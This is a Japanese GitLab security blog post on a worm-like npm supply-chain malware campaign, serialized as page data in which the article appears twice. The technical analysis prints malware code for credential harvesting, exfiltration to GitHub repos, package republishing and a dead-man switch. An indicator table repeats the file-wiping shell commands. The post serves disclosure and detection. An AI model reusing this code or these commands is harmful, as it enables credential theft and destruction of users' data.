[{"data":1,"prerenderedAt":825},["ShallowReactive",2],{"/ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack":3,"navigation-ja-jp":41,"banner-ja-jp":462,"footer-ja-jp":472,"blog-post-authors-ja-jp-Michael Henriksen|Daniel Abeles":708,"blog-related-posts-ja-jp-gitlab-discovers-widespread-npm-supply-chain-attack":734,"blog-promotions-ja-jp":764,"next-steps-ja-jp":816},{"id":4,"title":5,"authorSlugs":6,"authors":9,"body":12,"category":13,"categorySlug":13,"config":14,"content":18,"date":22,"description":26,"extension":27,"externalUrl":28,"featured":15,"heroImage":19,"isFeatured":15,"meta":29,"navigation":15,"path":30,"publishedDate":22,"rawbody":31,"seo":32,"slug":17,"stem":36,"tagSlugs":37,"tags":39,"template":16,"updatedDate":21,"__hash__":40},"blogPosts/ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack.yml","GitLabがnpmサプライチェーンへの大規模攻撃を発見",[7,8],"michael-henriksen","daniel-abeles",[10,11],"Michael Henriksen","Daniel Abeles","GitLabの脆弱性調査チームは、npmエコシステムを通じて拡散する破壊的なマルウェアの亜種を含む、現在進行中の大規模なサプライチェーン攻撃を特定しました。当社の内部監視システムにより、「[Shai-Hulud](https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem)」マルウェアの進化版と思われるものを含む、複数の感染パッケージが発見されました。\n\n初期分析では、影響を受けた開発者が保守する追加パッケージを自動的に感染させる、ワームのような伝播動作が確認されています。最も重要な点として、このマルウェアには、伝播チャネルとデータ流出チャネルが切断された場合にユーザーデータを破壊する「**デッドマンスイッチ**」メカニズムが含まれていることが判明しました。\n\n**GitLabはこれらの悪意のあるパッケージをいずれも使用していないことを確認しており、より広範なセキュリティコミュニティが効果的に対応できるよう、この調査結果を共有しています。**\n\n## 攻撃の内部\n\n当社の内部監視システムは、オープンソースパッケージレジストリをスキャンして悪意のあるパッケージを検出しますが、以下の機能を持つ高度なマルウェアに感染した複数のnpmパッケージを特定しました。\n\n* GitHub、npm、AWS、GCP、Azureから認証情報を収集\n* 盗まれたデータを攻撃者が管理するGitHubリポジトリに流出\n* 被害者が所有する他のパッケージを自動的に感染させることで伝播\n* **マルウェアがそのインフラストラクチャへのアクセスを失った場合にトリガーされる破壊的なペイロードを含む**\n\n複数の感染パッケージを確認していますが、ワームのような伝播メカニズムにより、さらに多くのパッケージが侵害されている可能性があります。このキャンペーンの全容を把握するため、コミュニティと協力して調査を継続しています。\n\n## 技術的分析:攻撃の展開プロセス\n\n![攻撃の展開プロセスを示すMermaidチャート](https://res.cloudinary.com/about-gitlab-com/image/upload/v1764040799/igbsaqqvlwjqbrnxmh8k.png)\n\n### 初期感染ベクトル\n\nマルウェアは、慎重に作成された多段階のローディングプロセスを通じてシステムに侵入します。感染したパッケージには、`setup_bun.js`を参照するpreinstallスクリプトを含む、変更された`package.json`が含まれています。このローダースクリプトは一見無害で、正規のツールであるBun JavaScriptランタイムをインストールするように見えます。しかし、その真の目的はマルウェアの実行環境を確立することです。\n\n```javascript\n// このファイルは被害者のパッケージにsetup_bun.jsとして追加されます\n#!/usr/bin/env node\nasync function downloadAndSetupBun() {\n  // bunをダウンロードしてインストールします\n  let command = process.platform === 'win32'\n    ? 'powershell -c \"irm bun.sh/install.ps1|iex\"'\n    : 'curl -fsSL https://bun.sh/install | bash';\n\n  execSync(command, { stdio: 'ignore' });\n\n  // 実際のマルウェアを実行します\n  runExecutable(bunPath, ['bun_environment.js']);\n}\n```\n\n`setup_bun.js`ローダーは、システム上でBunランタイムをダウンロードまたは検索し、感染したパッケージにすでに存在する10MBの難読化ファイルである、バンドルされた`bun_environment.js`ペイロードを実行します。このアプローチは複数の回避層を提供します。初期ローダーは小さく一見正規のものに見え、実際の悪意のあるコードは重度に難読化され、簡単な検査には大きすぎるファイルにバンドルされています。\n\n### 認証情報の収集\n\n実行されると、マルウェアは複数のソースから認証情報の検出を即座に開始します。\n\n* **GitHubトークン**:環境変数とGitHub CLI構成を検索し、`ghp_`(GitHub個人アクセストークン)または`gho_`(GitHub OAuthトークン)で始まるトークンを探します\n* **クラウド認証情報**:公式SDKを使用してAWS、GCP、Azureの認証情報を列挙し、環境変数、設定ファイル、メタデータサービスを確認します\n* **npmトークン**:`.npmrc`ファイルと環境変数からパッケージ公開用のトークンを抽出します。これらは機密性の高い設定と認証情報を安全に保存するための一般的な場所です\n* **ファイルシステムスキャン**:正規のセキュリティツールであるTrufflehogをダウンロードして実行し、ホームディレクトリ全体をスキャンして、設定ファイル、ソースコード、またはgit履歴に隠されたAPIキー、パスワード、その他のシークレットを探します\n\n```javascript\nasync function scanFilesystem() {\n  let scanner = new Trufflehog();\n  await scanner.initialize();\n\n  // ユーザーのホームディレクトリでシークレットをスキャンします\n  let findings = await scanner.scanFilesystem(os.homedir());\n\n  // 検出結果を流出用リポジトリにアップロードします\n  await github.saveContents(\"truffleSecrets.json\",\n    JSON.stringify(findings));\n}\n```\n\n### データ流出ネットワーク\n\nマルウェアは盗まれたGitHubトークンを使用して、説明に特定のマーカー「Sha1-Hulud: The Second Coming.」を含む公開リポジトリを作成します。これらのリポジトリは、盗まれた認証情報とシステム情報のドロップボックスとして機能します。\n\n```javascript\nasync function createRepo(name) {\n  // 特定の説明マーカーを持つリポジトリを作成します\n  let repo = await this.octokit.repos.createForAuthenticatedUser({\n    name: name,\n    description: \"Sha1-Hulud: The Second Coming.\", // 後でリポジトリを見つけるためのマーカー\n    private: false,\n    auto_init: false,\n    has_discussions: true\n  });\n\n  // 永続性のためにGitHub Actions Runnerをインストールします\n  if (await this.checkWorkflowScope()) {\n    let token = await this.octokit.request(\n      \"POST /repos/{owner}/{repo}/actions/runners/registration-token\"\n    );\n    await installRunner(token); // セルフホストRunnerをインストールします\n  }\n\n  return repo;\n}\n```\n\n重要なのは、初期のGitHubトークンに十分な権限がない場合、マルウェアは同じマーカーを持つ他の侵害されたリポジトリを検索し、他の感染したシステムからトークンを取得できることです。これにより、侵害されたシステムがアクセストークンを共有する、レジリエントなボットネットのようなネットワークが作成されます。\n\n```javascript\n// マルウェアネットワークがトークンを共有する方法:\nasync fetchToken() {\n  // 識別マーカーを持つリポジトリをGitHubで検索します\n  let results = await this.octokit.search.repos({\n    q: '\"Sha1-Hulud: The Second Coming.\"',\n    sort: \"updated\"\n  });\n\n  // 侵害されたリポジトリからトークンを取得しようとします\n  for (let repo of results) {\n    let contents = await fetch(\n      `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`\n    );\n\n    let data = JSON.parse(Buffer.from(contents, 'base64').toString());\n    let token = data?.modules?.github?.token;\n\n    if (token && await validateToken(token)) {\n      return token;  // 別の感染したシステムのトークンを使用します\n    }\n  }\n  return null;  // ネットワーク内に有効なトークンが見つかりませんでした\n}\n```\n\n### サプライチェーン伝播\n\n盗まれたnpmトークンを使用して、マルウェアは次のことを行います。\n\n1. 被害者が保守するすべてのパッケージをダウンロード\n2. 各パッケージのpreinstallスクリプトに`setup_bun.js`ローダーを注入\n3. 悪意のある`bun_environment.js`ペイロードをバンドル\n4. パッケージのバージョン番号をインクリメント\n5. 感染したパッケージをnpmに再公開\n\n```javascript\nasync function updatePackage(packageInfo) {\n  // 元のパッケージをダウンロードします\n  let tarball = await fetch(packageInfo.tarballUrl);\n\n  // package.jsonを抽出して変更します\n  let packageJson = JSON.parse(await readFile(\"package.json\"));\n\n  // 悪意のあるpreinstallスクリプトを追加します\n  packageJson.scripts.preinstall = \"node setup_bun.js\";\n\n  // バージョンをインクリメントします\n  let version = packageJson.version.split(\".\").map(Number);\n  version[2] = (version[2] || 0) + 1;\n  packageJson.version = version.join(\".\");\n\n  // バックドアインストーラーをバンドルします\n  await writeFile(\"setup_bun.js\", BACKDOOR_CODE);\n\n  // 再パッケージ化して公開します\n  await Bun.$`npm publish ${modifiedPackage}`.env({\n    NPM_CONFIG_TOKEN: this.token\n  });\n}\n```\n\n## デッドマンスイッチ\n\n当社の分析により、マルウェアのインフラストラクチャを削除の試みから保護するために設計された破壊的なペイロードが明らかになりました。\n\nマルウェアは、GitHub(流出用)およびnpm(伝播用)へのアクセスを継続的に監視します。感染したシステムが両方のチャネルへのアクセスを同時に失うと、侵害されたマシン上で即座にデータ破壊がトリガーされます。Windowsでは、すべてのユーザーファイルを削除し、ディスクセクターを上書きしようとします。Unixシステムでは、`shred`を使用してファイルを削除前に上書きし、復旧をほぼ不可能にします。\n\n```javascript\n// 重要:トークンの検証失敗が破壊をトリガーします\nasync function aL0() {\n  let githubApi = new dq();\n  let npmToken = process.env.NPM_TOKEN || await findNpmToken();\n\n  // GitHubアクセスを見つけるか作成しようとします\n  if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {\n    let fetchedToken = await githubApi.fetchToken(); // 侵害されたリポジトリでトークンを検索します\n\n    if (!fetchedToken) {  // GitHubアクセスが不可能です\n      if (npmToken) {\n        // npmの伝播のみにフォールバックします\n        await El(npmToken);\n      } else {\n        // 破壊トリガー:GitHubとnpmの両方へのアクセスがありません\n        console.log(\"Error 12\");\n        if (platform === \"windows\") {\n          // すべてのユーザーファイルを削除し、ディスクセクターを上書きしようとします\n          Bun.spawnSync([\"cmd.exe\", \"/c\",\n            \"del /F /Q /S \\\"%USERPROFILE%*\\\" && \" +\n            \"for /d %%i in (\\\"%USERPROFILE%*\\\") do rd /S /Q \\\"%%i\\\" & \" +\n            \"cipher /W:%USERPROFILE%\"  // 削除されたデータを上書きします\n          ]);\n        } else {\n          // ホームディレクトリ内のすべての書き込み可能なファイルを完全削除しようとします\n          Bun.spawnSync([\"bash\", \"-c\",\n            \"find \\\"$HOME\\\" -type f -writable -user \\\"$(id -un)\\\" -print0 | \" +\n            \"xargs -0 -r shred -uvz -n 1 && \" +  // 上書きして削除します\n            \"find \\\"$HOME\\\" -depth -type d -empty -delete\"  // 空のディレクトリを削除します\n          ]);\n        }\n        process.exit(0);\n      }\n    }\n  }\n}\n```\n\nこれにより危険なシナリオが生まれます。GitHubがマルウェアのリポジトリを一括削除するか、npmが侵害されたトークンを一括失効させると、数千の感染したシステムが同時にユーザーデータを破壊する可能性があります。攻撃の分散型の性質により、感染した各マシンが独立してアクセスを監視し、削除が検出されるとユーザーのデータの削除をトリガーします。\n\n## 侵害の痕跡\n\n検出と対応を支援するため、当社の分析中に特定された主要な侵害の痕跡(IoC)の包括的なリストを以下に示します。\n\n| タイプ        | 痕跡                                           | 説明                                         |\n| ---------- | -------------------------------------------- | ------------------------------------------ |\n| **ファイル**   | `bun_environment.js`                         | node_modulesディレクトリ内の悪意のあるpost-installスクリプト |\n| **ディレクトリ** | `.truffler-cache/`                           | Trufflehogバイナリストレージ用にユーザーホームに作成された隠しディレクトリ |\n| **ディレクトリ** | `.truffler-cache/extract/`                   | バイナリ抽出に使用される一時ディレクトリ                       |\n| **ファイル**   | `.truffler-cache/trufflehog`                 | ダウンロードされたTrufflehogバイナリ(Linux/Mac)         |\n| **ファイル**   | `.truffler-cache/trufflehog.exe`             | ダウンロードされたTrufflehogバイナリ(Windows)           |\n| **プロセス**   | `del /F /Q /S \"%USERPROFILE%*\"`              | Windowsの破壊的ペイロードコマンド                       |\n| **プロセス**   | `shred -uvz -n 1`                            | Linux/Macの破壊的ペイロードコマンド                     |\n| **プロセス**   | `cipher /W:%USERPROFILE%`                    | ペイロード内のWindows安全削除コマンド                     |\n| **コマンド**   | `curl -fsSL https://bun.sh/install \\| bash`   | npmパッケージインストール中の不審なBunインストール               |\n| **コマンド**   | `powershell -c \"irm bun.sh/install.ps1\\|iex\"` | PowerShell経由のWindowsBunインストール              |\n\n## GitLabでこのマルウェアキャンペーンを検出する方法\n\nGitLab Ultimateをご利用の場合、組み込みのセキュリティ機能を活用して、プロジェクト内でこの攻撃に関連する脆弱性を即座に表示できます。\n\nまず、**[依存関係スキャン](https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/dependency_scanning_sbom/)**を有効にして、既知の脆弱性データベースに対してプロジェクトの依存関係を自動的に分析します。** `package-lock.json`または`yarn.lock`ファイルに感染したパッケージが存在する場合、依存関係スキャンはパイプライン結果と脆弱性レポートでそれらにフラグを立てます。** 完全なセットアップ手順については、[依存関係スキャンのドキュメント](https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/dependency_scanning_sbom/#enabling-the-analyzer)を参照してください。\n\n有効にすると、侵害されたパッケージを導入するマージリクエストは、コードがメインブランチに到達する前に警告を表示します。\n\n次に、**[GitLab Duo Chat](https://docs.gitlab.com/ja-jp/user/gitlab_duo_chat/agentic_chat/)** を依存関係スキャンと組み合わせて使用すると、レポートを確認することなく、プロジェクトの脆弱性を迅速に確認できます。ドロップダウンから[セキュリティアナリストエージェント](https://docs.gitlab.com/ja-jp/user/duo_agent_platform/agents/foundational_agents/security_analyst_agent/)を選択し、次のような質問をするだけです。\n\n* 「Shai-Hulud v2マルウェアキャンペーンの影響を受ける依存関係はありますか?」\n* 「このプロジェクトにnpmサプライチェーンの脆弱性はありますか?」\n* 「このプロジェクトにnpmサプライチェーンの脆弱性はありますか?」\n* 「JavaScript依存関係の重大な脆弱性を表示してください。」\n\nエージェントはプロジェクトの脆弱性データをクエリし、直接的な回答を提供するため、セキュリティチームが複数のプロジェクトを迅速にトリアージするのに役立ちます。\n\n![GitLabセキュリティアナリストエージェントの検出結果](https://res.cloudinary.com/about-gitlab-com/image/upload/v1764196041/ciwroqeub2ayhjcbajec.png)\n\n多数のリポジトリを管理するチームには、これらのアプローチを組み合わせることをお勧めします。CI/CDでの継続的な自動検出には依存関係スキャンを使用し、このような進行中のインシデント時のアドホック調査と迅速な対応にはセキュリティアナリストエージェントを使用してください。\n\n## 今後の展望\n\nこのキャンペーンは、巻き添え被害の脅威が攻撃者のインフラストラクチャの主要な防御メカニズムとなるサプライチェーン攻撃の進化を表しています。全容を把握し、安全な修復戦略を開発するため、コミュニティと協力して調査を継続しています。\n\nGitLabの自動検出システムは、この攻撃の新しい感染とバリエーションを監視し続けています。調査結果を早期に共有することで、マルウェアのデッドマンスイッチ設計によって生じる落とし穴を回避しながら、コミュニティが効果的に対応できるよう支援できることを願っています。","security-labs",{"featured":15,"template":16,"slug":17},true,"BlogPost","gitlab-discovers-widespread-npm-supply-chain-attack",{"heroImage":19,"body":12,"authors":20,"updatedDate":21,"date":22,"title":5,"tags":23,"description":26,"category":13},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg",[10,11],"2025-12-01","2025-11-24",[24,25],"security","security research","攻撃を引き起こすマルウェアには、ユーザーデータを破壊する「デッドマンスイッチ」が含まれています。","yml",null,{},"/ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack","seo:\n  config:\n    noIndex: false\n  title: GitLabがnpmサプライチェーンへの大規模攻撃を発見\n  description: 攻撃を引き起こすマルウェアには、ユーザーデータを破壊する「デッドマンスイッチ」が含まれています。\n  ogImage: https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/v1749665667/Blog/Hero%20Images/built-in-security.jpg\ncontent:\n  heroImage: https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg\n  body: >-\n    GitLabの脆弱性調査チームは、npmエコシステムを通じて拡散する破壊的なマルウェアの亜種を含む、現在進行中の大規模なサプライチェーン攻撃を特定しました。当社の内部監視システムにより、「[Shai-Hulud](https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem)」マルウェアの進化版と思われるものを含む、複数の感染パッケージが発見されました。\n\n\n    初期分析では、影響を受けた開発者が保守する追加パッケージを自動的に感染させる、ワームのような伝播動作が確認されています。最も重要な点として、このマルウェアには、伝播チャネルとデータ流出チャネルが切断された場合にユーザーデータを破壊する「**デッドマンスイッチ**」メカニズムが含まれていることが判明しました。\n\n\n    **GitLabはこれらの悪意のあるパッケージをいずれも使用していないことを確認しており、より広範なセキュリティコミュニティが効果的に対応できるよう、この調査結果を共有しています。**\n\n\n    ## 攻撃の内部\n\n\n    当社の内部監視システムは、オープンソースパッケージレジストリをスキャンして悪意のあるパッケージを検出しますが、以下の機能を持つ高度なマルウェアに感染した複数のnpmパッケージを特定しました。\n\n\n    * GitHub、npm、AWS、GCP、Azureから認証情報を収集\n\n    * 盗まれたデータを攻撃者が管理するGitHubリポジトリに流出\n\n    * 被害者が所有する他のパッケージを自動的に感染させることで伝播\n\n    * **マルウェアがそのインフラストラクチャへのアクセスを失った場合にトリガーされる破壊的なペイロードを含む**\n\n\n    複数の感染パッケージを確認していますが、ワームのような伝播メカニズムにより、さらに多くのパッケージが侵害されている可能性があります。このキャンペーンの全容を把握するため、コミュニティと協力して調査を継続しています。\n\n\n    ## 技術的分析:攻撃の展開プロセス\n\n\n    ![攻撃の展開プロセスを示すMermaidチャート](https://res.cloudinary.com/about-gitlab-com/image/upload/v1764040799/igbsaqqvlwjqbrnxmh8k.png)\n\n\n    ### 初期感染ベクトル\n\n\n    マルウェアは、慎重に作成された多段階のローディングプロセスを通じてシステムに侵入します。感染したパッケージには、`setup_bun.js`を参照するpreinstallスクリプトを含む、変更された`package.json`が含まれています。このローダースクリプトは一見無害で、正規のツールであるBun JavaScriptランタイムをインストールするように見えます。しかし、その真の目的はマルウェアの実行環境を確立することです。\n\n\n    ```javascript\n\n    // このファイルは被害者のパッケージにsetup_bun.jsとして追加されます\n\n    #!/usr/bin/env node\n\n    async function downloadAndSetupBun() {\n      // bunをダウンロードしてインストールします\n      let command = process.platform === 'win32'\n        ? 'powershell -c \"irm bun.sh/install.ps1|iex\"'\n        : 'curl -fsSL https://bun.sh/install | bash';\n\n      execSync(command, { stdio: 'ignore' });\n\n      // 実際のマルウェアを実行します\n      runExecutable(bunPath, ['bun_environment.js']);\n    }\n\n    ```\n\n\n    `setup_bun.js`ローダーは、システム上でBunランタイムをダウンロードまたは検索し、感染したパッケージにすでに存在する10MBの難読化ファイルである、バンドルされた`bun_environment.js`ペイロードを実行します。このアプローチは複数の回避層を提供します。初期ローダーは小さく一見正規のものに見え、実際の悪意のあるコードは重度に難読化され、簡単な検査には大きすぎるファイルにバンドルされています。\n\n\n    ### 認証情報の収集\n\n\n    実行されると、マルウェアは複数のソースから認証情報の検出を即座に開始します。\n\n\n    * **GitHubトークン**:環境変数とGitHub CLI構成を検索し、`ghp_`(GitHub個人アクセストークン)または`gho_`(GitHub OAuthトークン)で始まるトークンを探します\n\n    * **クラウド認証情報**:公式SDKを使用してAWS、GCP、Azureの認証情報を列挙し、環境変数、設定ファイル、メタデータサービスを確認します\n\n    * **npmトークン**:`.npmrc`ファイルと環境変数からパッケージ公開用のトークンを抽出します。これらは機密性の高い設定と認証情報を安全に保存するための一般的な場所です\n\n    * **ファイルシステムスキャン**:正規のセキュリティツールであるTrufflehogをダウンロードして実行し、ホームディレクトリ全体をスキャンして、設定ファイル、ソースコード、またはgit履歴に隠されたAPIキー、パスワード、その他のシークレットを探します\n\n\n    ```javascript\n\n    async function scanFilesystem() {\n      let scanner = new Trufflehog();\n      await scanner.initialize();\n\n      // ユーザーのホームディレクトリでシークレットをスキャンします\n      let findings = await scanner.scanFilesystem(os.homedir());\n\n      // 検出結果を流出用リポジトリにアップロードします\n      await github.saveContents(\"truffleSecrets.json\",\n        JSON.stringify(findings));\n    }\n\n    ```\n\n\n    ### データ流出ネットワーク\n\n\n    マルウェアは盗まれたGitHubトークンを使用して、説明に特定のマーカー「Sha1-Hulud: The Second Coming.」を含む公開リポジトリを作成します。これらのリポジトリは、盗まれた認証情報とシステム情報のドロップボックスとして機能します。\n\n\n    ```javascript\n\n    async function createRepo(name) {\n      // 特定の説明マーカーを持つリポジトリを作成します\n      let repo = await this.octokit.repos.createForAuthenticatedUser({\n        name: name,\n        description: \"Sha1-Hulud: The Second Coming.\", // 後でリポジトリを見つけるためのマーカー\n        private: false,\n        auto_init: false,\n        has_discussions: true\n      });\n\n      // 永続性のためにGitHub Actions Runnerをインストールします\n      if (await this.checkWorkflowScope()) {\n        let token = await this.octokit.request(\n          \"POST /repos/{owner}/{repo}/actions/runners/registration-token\"\n        );\n        await installRunner(token); // セルフホストRunnerをインストールします\n      }\n\n      return repo;\n    }\n\n    ```\n\n\n    重要なのは、初期のGitHubトークンに十分な権限がない場合、マルウェアは同じマーカーを持つ他の侵害されたリポジトリを検索し、他の感染したシステムからトークンを取得できることです。これにより、侵害されたシステムがアクセストークンを共有する、レジリエントなボットネットのようなネットワークが作成されます。\n\n\n    ```javascript\n\n    // マルウェアネットワークがトークンを共有する方法:\n\n    async fetchToken() {\n      // 識別マーカーを持つリポジトリをGitHubで検索します\n      let results = await this.octokit.search.repos({\n        q: '\"Sha1-Hulud: The Second Coming.\"',\n        sort: \"updated\"\n      });\n\n      // 侵害されたリポジトリからトークンを取得しようとします\n      for (let repo of results) {\n        let contents = await fetch(\n          `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`\n        );\n\n        let data = JSON.parse(Buffer.from(contents, 'base64').toString());\n        let token = data?.modules?.github?.token;\n\n        if (token && await validateToken(token)) {\n          return token;  // 別の感染したシステムのトークンを使用します\n        }\n      }\n      return null;  // ネットワーク内に有効なトークンが見つかりませんでした\n    }\n\n    ```\n\n\n    ### サプライチェーン伝播\n\n\n    盗まれたnpmトークンを使用して、マルウェアは次のことを行います。\n\n\n    1. 被害者が保守するすべてのパッケージをダウンロード\n\n    2. 各パッケージのpreinstallスクリプトに`setup_bun.js`ローダーを注入\n\n    3. 悪意のある`bun_environment.js`ペイロードをバンドル\n\n    4. パッケージのバージョン番号をインクリメント\n\n    5. 感染したパッケージをnpmに再公開\n\n\n    ```javascript\n\n    async function updatePackage(packageInfo) {\n      // 元のパッケージをダウンロードします\n      let tarball = await fetch(packageInfo.tarballUrl);\n\n      // package.jsonを抽出して変更します\n      let packageJson = JSON.parse(await readFile(\"package.json\"));\n\n      // 悪意のあるpreinstallスクリプトを追加します\n      packageJson.scripts.preinstall = \"node setup_bun.js\";\n\n      // バージョンをインクリメントします\n      let version = packageJson.version.split(\".\").map(Number);\n      version[2] = (version[2] || 0) + 1;\n      packageJson.version = version.join(\".\");\n\n      // バックドアインストーラーをバンドルします\n      await writeFile(\"setup_bun.js\", BACKDOOR_CODE);\n\n      // 再パッケージ化して公開します\n      await Bun.$`npm publish ${modifiedPackage}`.env({\n        NPM_CONFIG_TOKEN: this.token\n      });\n    }\n\n    ```\n\n\n    ## デッドマンスイッチ\n\n\n    当社の分析により、マルウェアのインフラストラクチャを削除の試みから保護するために設計された破壊的なペイロードが明らかになりました。\n\n\n    マルウェアは、GitHub(流出用)およびnpm(伝播用)へのアクセスを継続的に監視します。感染したシステムが両方のチャネルへのアクセスを同時に失うと、侵害されたマシン上で即座にデータ破壊がトリガーされます。Windowsでは、すべてのユーザーファイルを削除し、ディスクセクターを上書きしようとします。Unixシステムでは、`shred`を使用してファイルを削除前に上書きし、復旧をほぼ不可能にします。\n\n\n    ```javascript\n\n    // 重要:トークンの検証失敗が破壊をトリガーします\n\n    async function aL0() {\n      let githubApi = new dq();\n      let npmToken = process.env.NPM_TOKEN || await findNpmToken();\n\n      // GitHubアクセスを見つけるか作成しようとします\n      if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {\n        let fetchedToken = await githubApi.fetchToken(); // 侵害されたリポジトリでトークンを検索します\n\n        if (!fetchedToken) {  // GitHubアクセスが不可能です\n          if (npmToken) {\n            // npmの伝播のみにフォールバックします\n            await El(npmToken);\n          } else {\n            // 破壊トリガー:GitHubとnpmの両方へのアクセスがありません\n            console.log(\"Error 12\");\n            if (platform === \"windows\") {\n              // すべてのユーザーファイルを削除し、ディスクセクターを上書きしようとします\n              Bun.spawnSync([\"cmd.exe\", \"/c\",\n                \"del /F /Q /S \\\"%USERPROFILE%*\\\" && \" +\n                \"for /d %%i in (\\\"%USERPROFILE%*\\\") do rd /S /Q \\\"%%i\\\" & \" +\n                \"cipher /W:%USERPROFILE%\"  // 削除されたデータを上書きします\n              ]);\n            } else {\n              // ホームディレクトリ内のすべての書き込み可能なファイルを完全削除しようとします\n              Bun.spawnSync([\"bash\", \"-c\",\n                \"find \\\"$HOME\\\" -type f -writable -user \\\"$(id -un)\\\" -print0 | \" +\n                \"xargs -0 -r shred -uvz -n 1 && \" +  // 上書きして削除します\n                \"find \\\"$HOME\\\" -depth -type d -empty -delete\"  // 空のディレクトリを削除します\n              ]);\n            }\n            process.exit(0);\n          }\n        }\n      }\n    }\n\n    ```\n\n\n    これにより危険なシナリオが生まれます。GitHubがマルウェアのリポジトリを一括削除するか、npmが侵害されたトークンを一括失効させると、数千の感染したシステムが同時にユーザーデータを破壊する可能性があります。攻撃の分散型の性質により、感染した各マシンが独立してアクセスを監視し、削除が検出されるとユーザーのデータの削除をトリガーします。\n\n\n    ## 侵害の痕跡\n\n\n    検出と対応を支援するため、当社の分析中に特定された主要な侵害の痕跡(IoC)の包括的なリストを以下に示します。\n\n\n    | タイプ        | 痕跡                                           | 説明                                         |\n\n    | ---------- | -------------------------------------------- | ------------------------------------------ |\n\n    | **ファイル**   | `bun_environment.js`                         | node_modulesディレクトリ内の悪意のあるpost-installスクリプト |\n\n    | **ディレクトリ** | `.truffler-cache/`                           | Trufflehogバイナリストレージ用にユーザーホームに作成された隠しディレクトリ |\n\n    | **ディレクトリ** | `.truffler-cache/extract/`                   | バイナリ抽出に使用される一時ディレクトリ                       |\n\n    | **ファイル**   | `.truffler-cache/trufflehog`                 | ダウンロードされたTrufflehogバイナリ(Linux/Mac)         |\n\n    | **ファイル**   | `.truffler-cache/trufflehog.exe`             | ダウンロードされたTrufflehogバイナリ(Windows)           |\n\n    | **プロセス**   | `del /F /Q /S \"%USERPROFILE%*\"`              | Windowsの破壊的ペイロードコマンド                       |\n\n    | **プロセス**   | `shred -uvz -n 1`                            | Linux/Macの破壊的ペイロードコマンド                     |\n\n    | **プロセス**   | `cipher /W:%USERPROFILE%`                    | ペイロード内のWindows安全削除コマンド                     |\n\n    | **コマンド**   | `curl -fsSL https://bun.sh/install \\| bash`   | npmパッケージインストール中の不審なBunインストール               |\n\n    | **コマンド**   | `powershell -c \"irm bun.sh/install.ps1\\|iex\"` | PowerShell経由のWindowsBunインストール              |\n\n\n    ## GitLabでこのマルウェアキャンペーンを検出する方法\n\n\n    GitLab Ultimateをご利用の場合、組み込みのセキュリティ機能を活用して、プロジェクト内でこの攻撃に関連する脆弱性を即座に表示できます。\n\n\n    まず、**[依存関係スキャン](https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/dependency_scanning_sbom/)**を有効にして、既知の脆弱性データベースに対してプロジェクトの依存関係を自動的に分析します。** `package-lock.json`または`yarn.lock`ファイルに感染したパッケージが存在する場合、依存関係スキャンはパイプライン結果と脆弱性レポートでそれらにフラグを立てます。** 完全なセットアップ手順については、[依存関係スキャンのドキュメント](https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/dependency_scanning_sbom/#enabling-the-analyzer)を参照してください。\n\n\n    有効にすると、侵害されたパッケージを導入するマージリクエストは、コードがメインブランチに到達する前に警告を表示します。\n\n\n    次に、**[GitLab Duo Chat](https://docs.gitlab.com/ja-jp/user/gitlab_duo_chat/agentic_chat/)** を依存関係スキャンと組み合わせて使用すると、レポートを確認することなく、プロジェクトの脆弱性を迅速に確認できます。ドロップダウンから[セキュリティアナリストエージェント](https://docs.gitlab.com/ja-jp/user/duo_agent_platform/agents/foundational_agents/security_analyst_agent/)を選択し、次のような質問をするだけです。\n\n\n    * 「Shai-Hulud v2マルウェアキャンペーンの影響を受ける依存関係はありますか?」\n\n    * 「このプロジェクトにnpmサプライチェーンの脆弱性はありますか?」\n\n    * 「このプロジェクトにnpmサプライチェーンの脆弱性はありますか?」\n\n    * 「JavaScript依存関係の重大な脆弱性を表示してください。」\n\n\n    エージェントはプロジェクトの脆弱性データをクエリし、直接的な回答を提供するため、セキュリティチームが複数のプロジェクトを迅速にトリアージするのに役立ちます。\n\n\n    ![GitLabセキュリティアナリストエージェントの検出結果](https://res.cloudinary.com/about-gitlab-com/image/upload/v1764196041/ciwroqeub2ayhjcbajec.png)\n\n\n    多数のリポジトリを管理するチームには、これらのアプローチを組み合わせることをお勧めします。CI/CDでの継続的な自動検出には依存関係スキャンを使用し、このような進行中のインシデント時のアドホック調査と迅速な対応にはセキュリティアナリストエージェントを使用してください。\n\n\n    ## 今後の展望\n\n\n    このキャンペーンは、巻き添え被害の脅威が攻撃者のインフラストラクチャの主要な防御メカニズムとなるサプライチェーン攻撃の進化を表しています。全容を把握し、安全な修復戦略を開発するため、コミュニティと協力して調査を継続しています。\n\n\n    GitLabの自動検出システムは、この攻撃の新しい感染とバリエーションを監視し続けています。調査結果を早期に共有することで、マルウェアのデッドマンスイッチ設計によって生じる落とし穴を回避しながら、コミュニティが効果的に対応できるよう支援できることを願っています。\n  authors:\n    - Michael Henriksen\n    - Daniel Abeles\n  updatedDate: 2025-12-01\n  date: 2025-11-24\n  title: GitLabがnpmサプライチェーンへの大規模攻撃を発見\n  tags:\n    - security\n    - security research\n  description: 攻撃を引き起こすマルウェアには、ユーザーデータを破壊する「デッドマンスイッチ」が含まれています。\n  category: security-labs\nconfig:\n  featured: true\n  template: BlogPost\n  slug: 